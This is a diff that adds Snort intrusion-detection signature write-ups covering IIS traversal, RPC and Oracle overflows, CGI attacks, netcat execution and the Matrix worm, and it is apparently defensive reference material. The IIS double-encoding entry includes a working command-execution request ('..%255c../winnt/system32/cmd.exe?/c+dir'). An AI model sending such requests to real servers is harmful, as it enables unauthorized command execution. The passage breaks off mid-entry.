+--
+Detailed Information:
+User access should be restricted to an assigned web root directory and subdirectories when interacting with a web server.  Attackers who attempt to perform directory traversals outside the web root should be denied access.  A vulnerability exists in IIS web servers that allows directory traversal outside the web root directory when Micorosoft double encoding of specific characters is used.  This particular attack uses the double encoding of the "/" to escape the web root.  This may permit an attacker to execute commands on the vulnerable server. 
+
+--
+Affected Systems:
+IIS 3.0, 4.0, 5.0 servers
+
+--
+Attack Scenarios:
+An attacker can double encode a directory traversal character permitting execution of commands on the IIS server. 
+
+--
+Ease of Attack:
+Simple. 
+GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link. 
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2708
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms01-044.asp
+
+--
--- /dev/null
+++ b/doc/signatures/972.txt
@@ -0,0 +1,61 @@
+Will be obsolete when httpinspect is used
+Rule:
+
+--
+Sid:
+972
+
+--
+Summary:
+This event is generated when an attempt is made to access an Active Server Page (ASP) .asp file when the period is hex encoded as "%2e". 
+
+--
+Impact:
+Intelligence gathering activity.  A vulnerability exists that discloses the .asp file contents when it is reference using the "%2e" hex encoding. 
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) uses Active Server Page to supply HTML and server-side scripting.  ASP files use a .asp extension.  When the period of the .asp is hex-encoded with a "%2e" to reference an ASP file, the contents of the file are disclosed.
+
+--
+Affected Systems:
+Hosts running IIS 3.0
+
+--
+Attack Scenarios:
+An attacker can attempt use the hex-encoded reference to the .asp file to see the contents of the file.  Sensitive information may by disclosed depending on the selected file. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0253
+
+Bugtraq:
+http://www.securityfocus.com/bid/1814
+
+
+--
--- /dev/null
+++ b/doc/signatures/1270.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1270
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rstatd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rstatd is using.  Attackers can also learn what versions of the rstatd protocol are accepted by rstatd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rstatd run.  The rstatd RPC service can be queried for performance statistics obtained from the kernel including network, disk, and CPU.  This can provide valuable information to determine which host may make a suitable target to participate in a particular attack. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rstatd runs.  This may be a precursor to querying rstatd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rstatd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rstatd, not probes of the rstatd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rstatd service itself. An attacker may attempt to go directly to the rstatd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS10
+
+
+--
--- /dev/null
+++ b/doc/signatures/1062.txt
@@ -0,0 +1,52 @@
+Rule:  
+--
+Sid:
+1062
+--
+Summary:
+Netcat execution attempt - Netcat is a very flexible and powerfull tcp and udp port listener
+--
+Impact:
+Serious. Full compromise of the host is possible. An attacker may have already compromised your system using another exploit and installed netcat to easily access a remote shell
+--
+Detailed Information:
+This event is generated when an attempt is made to execute Netcat via a web session.
+
+Netcat can be used for port forwarding, remote shell binding, file transfer etc. It is a security risk if someone can use the tool remotetly
+--
+Attack Scenarios:
+Usually nc.exe is uploaded after a successfull attack with another exploit. Netcat may then be executed via a web session to spawn a shell session the attacker can use for further system compromise.
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+A simple www.yourhost.net/nc.exe can trigger this rule. check if the file exists and use further protection software (host based IDS) to protect you from unknown files which could be uploaded.
+
+--
+False Negatives:
+The filename nc.exe was renamed and netcat is on your host already with another filename, probably bound to a shell already.
+
+--
+Corrective Action:
+Remove nc.exe.
+
+Portscan your host and check your firewall log files for IP's accessing the suspect port where netcat listens to gain information about the attacker.
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2714.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2714
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure resume_subset_of_masters
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2507.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2507
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2919.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2919
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_untrusted.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1609.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1609
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000645.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000645
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_delete.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3071.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3071
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"status" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3325.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3325
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1480.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1480
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2390.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2390
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd STOU command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the STOU command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the STOU 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1358.txt
@@ -0,0 +1,53 @@
+Rule: 
+
+--
+Sid: 1358
+
+-- 
+Summary: 
+A web command execution attack involving the use of a "traceroute" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity. 
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "traceroute" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "traceroute" command may be used to perform information gathering activities. The rule looks for the "traceroute" command in the client to web server network traffic but does not indicate whether the command was actually successful. The presence of the "traceroute" command in the URI indicates that an attacker attempted to trick the web server into executing system commands in non-interactive mode i.e. without a valid shell session. 
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "traceroute" command to perform anonymous reconnaissance
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+none known
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1845.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1845
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP LIST
+command with a malformed and overly long argument to an internal IMAP
+server port. This may indicate an attempt to exploit a buffer overflow
+vulnerability in the IMAP LIST command. This may also affect other IMAP
+server implementations.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a LIST command with an overly long argument is sent to a vulnerable
+IMAP server, a buffer overflow condition may occur. This can allow an
+attacker to execute arbitrary code from the command shell. Note that
+this exploit can only be attempted by a user with a valid IMAP account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LIST command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system. 
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/967.txt
@@ -0,0 +1,73 @@
+Rule:
+--
+Sid:  
+967
+
+--
+Summary:  
+dvwssr.dll is a component installed with Windows NT Option Pack 4.0, 
+Personal Web Server for Windows 95 and 98 and Front Page 98 Server 
+Extensions. This component is vulnerable to a buffer overflow which 
+may allow for the execution of arbitrary code that would run in the 
+context of the system account.
+
+--
+Impact:
+Serious. Execution of arbitrary code and Denial of Service (DoS).
+
+--
+Detailed Information:  
+As with an abundance of other exploits related to Microsoft's Internet 
+Information Services and web server based implementations, it is 
+possible for an attacker to run code of choice against the vulnerable 
+web server.  It is also possible to use this exploit to stop the remote 
+server from responding which would result in a DoS.
+
+--
+Attack Scenarios:  
+   
+
+--
+Ease of Attack:  
+This attack would require for both the dvwssr.dll file to reside on the 
+web server and for the correct permissions to be in place in order for 
+the attack to be successful.  Using a script to send continued requests 
+for the file dvwssr.dll would make a denial of service attack fairly 
+easy.
+
+--
+False Positives:  
+Web requests or web based applications which use dvwssr.dll in a context
+which in not malicious in nature.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:  
+Remove dvwssr.dll from the web server and test all necessary 
+functionality.  See additional references for more information.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Chris Arsenault	<carsenault@firstedcu.org> and Josh Gray
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+--
+Additional References:
+
+Security Focus BugTraq ID
+http://www.securityfocus.com/bid/1109
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260
+
+Microsoft ms00-025
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms00-025.asp
+ 
+
+--
--- /dev/null
+++ b/doc/signatures/2840.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2840
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_snapshot_propagation
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1849.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1849
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/481.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+481
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running TJPingPro 1.1 Build 2 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running TJPingPro 1.1 Build 2 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS167
+
+--
--- /dev/null
+++ b/doc/signatures/1543.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1543
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/734.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+734
+
+--
+Summary:
+This event is generated when Matrix worm activity is detected.
+
+--
+Impact:
+Severe - Windows system files can be deleted/replaced/infected 
+(Wsock32.dll, Explorer.exe and Rundll32.exe). 
+
+The virus propagation is done when a user sends e-mail, but variants may
+exist that display other characteristics.
+
+--
+Detailed Information:
+Matrix worm is distributed via e-mail when a user sends some e-mail to a recipient. The attachement name is random. File suffixes can be .exe, .com, .bat, .pif, .scr, .jpg.pif.. etc. The worm code uses plugins which can make the virus really dangerous (e.x. installing backdoors). Removal could be difficult, but free removal tools exist (see below).
+
+--
+Attack Scenarios:
+An attacker sends the Matrix worm using a MIME exploit which executes the virus code automatically. The worm can now distribute itself using the mail client of the user and can install backdoors and infect EXE files.
+
+--
+Ease of Attack:
